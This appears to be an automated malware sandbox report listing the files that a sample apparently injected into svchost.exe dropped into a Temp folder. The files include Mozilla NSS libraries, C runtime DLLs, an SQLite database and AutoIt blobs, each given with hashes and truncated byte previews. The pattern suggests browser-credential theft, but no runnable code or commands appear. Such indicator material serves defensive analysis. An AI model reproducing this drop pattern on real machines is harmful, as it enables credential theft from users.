                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-multibyte-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):26424
                                Entropy (8bit):6.712286643697659
                                Encrypted:false
                                SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                MD5:35FC66BD813D0F126883E695664E7B83
                                SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-private-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):73016
                                Entropy (8bit):5.838702055399663
                                Encrypted:false
                                SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-process-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19256
                                Entropy (8bit):7.076072254895036
                                Encrypted:false
                                SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                MD5:8D02DD4C29BD490E672D271700511371
                                SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-runtime-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22840
                                Entropy (8bit):6.942029615075195
                                Encrypted:false
                                SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-stdio-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):24368
                                Entropy (8bit):6.873960147000383
                                Encrypted:false
                                SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-string-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):23488
                                Entropy (8bit):6.840671293766487
                                Encrypted:false
                                SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-time-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):20792
                                Entropy (8bit):7.018061005886957
                                Encrypted:false
                                SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                MD5:849F2C3EBF1FCBA33D16153692D5810F
                                SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-utility-l1-1-0.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):18744
                                Entropy (8bit):7.127951145819804
                                Encrypted:false
                                SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                MD5:B52A0CA52C9C207874639B62B6082242
                                SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\freebl3.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):332752
                                Entropy (8bit):6.8061257098244905
                                Encrypted:false
                                SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                MD5:343AA83574577727AABE537DCCFDEAFC
                                SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\mozglue.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):139216
                                Entropy (8bit):6.841477908153926
                                Encrypted:false
                                SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                MD5:9E682F1EB98A9D41468FC3E50F907635
                                SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\msvcp140.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):440120
                                Entropy (8bit):6.652844702578311
                                Encrypted:false
                                SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\nss3.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1244112
                                Entropy (8bit):6.809431682312062
                                Encrypted:false
                                SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                MD5:556EA09421A0F74D31C4C0A89A70DC23
                                SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\nssdbm3.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):92624
                                Entropy (8bit):6.639368309935547
                                Encrypted:false
                                SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                MD5:569A7A65658A46F9412BDFA04F86E2B2
                                SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\softokn3.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):144336
                                Entropy (8bit):6.5527585854849395
                                Encrypted:false
                                SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                MD5:67827DB2380B5848166A411BAE9F0632
                                SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\ucrtbase.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1142072
                                Entropy (8bit):6.809041027525523
                                Encrypted:false
                                SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                MD5:D6326267AE77655F312D2287903DB4D3
                                SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\3F5A6467\vcruntime140.dll

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):83784
                                Entropy (8bit):6.890347360270656
                                Encrypted:false
                                SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                MD5:7587BF9CB4147022CD5681B015183046
                                SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\40885317949963744506502.tmp

                                Download File
                                Process:C:\Windows\SysWOW64\svchost.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\aut40C4.tmp

                                Download File
                                Process:C:\Users\user\Desktop\4QihT6CwD8.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89398
                                Entropy (8bit):7.84788677095475
                                Encrypted:false
                                SSDEEP:1536:+HBa+xOfwg+fwwUnyLmOvtxZIk0CEgIIOb9mreoxakJ3/Qzu8lsEQAL51FD3:OBa+Y1+fCyLmMv6lIOsSoxak9/Q99QAt
                                MD5:A6E4AAE0119F013B5005289ED4CE43C7
                                SHA1:D632DBC08A2503CA58FAD21C3D664381E3639E6E
                                SHA-256:AA6B12A07818544E125C98B918C047778A2AE3D49EFFB967339C5D6582D08DA6
                                SHA-512:FA447BD3EF463CFB332E625268E7DBD6CBA3E44B600CF18447CE31E834483C75602278B091E3EA046A12D736CA96C48B694B2112513A3DEEFDC65379B27E2264
                                Malicious:false
                                Preview:EA06.....D.t.%..0..+T..>.9..*t.0....S.ty..sO...^.U...f4Y..S..~T....T..=]LnA:.Y.....u4.Y..T..1.Y.....{;..V[t.M`...8....!....:L*.K.S..{.....n..I....$.l.0.O.T........ C..z...2..i`....0n.I.P..1E...t.4..A.. `....H{1R..( ..v..I.U@@?.h..#..........@t.8.....g.Qk0.L... .......@.....x.....S..X...B...8`...(......!..&Rzt.O..<.....(|....O(..g1:..... +...p.C..(.....&.L.....C.......u..&.B..&. .aE......Z.0.S".).T........b+K.N ..u'..`...q..ja`..2...Id3.d^A...(PI..F.!.x....... h..."...r.9.."t....0....8..s....:.l:aP.F.2........z7...sPi.;....3a....C0P.....3......C7......3I...,.C4......35...<.C0......3%.....C3......3Q...L.C:..........`.....T.|....L.t.<..e.a6x..S....l{o.Z...."..L:.. ..3.....C:.....3........%.../3...O...h..wc...m9....uM.bc..nG7..R...d....Rn.N/...C..Nt..P.S..].RE..Sy..d.#..vy.n=...b.nw/....7;.../=.^0....^.Fi.......*..../L.B.\.n....b9......."..,.....<.T&....#6X7.I..9..$V..X....{....bs.%.O..h.8%...I9.?.Y...a...;....`s.%v..._a.........\m..!E..)[.E.}>.n.{,V.

                                C:\Users\user\AppData\Local\Temp\aut4104.tmp

                                Download File
                                Process:C:\Users\user\Desktop\4QihT6CwD8.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):43606
                                Entropy (8bit):7.825175976843791
                                Encrypted:false
                                SSDEEP:768:fVv3c6K92HPbddDg1d5yh4eyJylfVkCA4h5inFL6QlHsaVIOW63:fd3rVzdK1dwsJoVfyfHsaVIOWs
                                MD5:DF0725BC4940539F44CA2D11C1DED4D6
                                SHA1:98AEFD117614AE90CE3728C7ED053547DBE97608
                                SHA-256:D4F2FAB0624AD11F1A5637C9AF6749D767F4D94D0F508FC18B36CAAA8909F41F
                                SHA-512:3EF7FFBB0AE4DA4E901E417EFAAF7B10240E8E04B4172D3E568BDEA3F9F73BD1FF61DE59ECDD4F86B75668A334B202FC9FFF3CF169F8310772D1D00B03300E94
                                Malicious:false
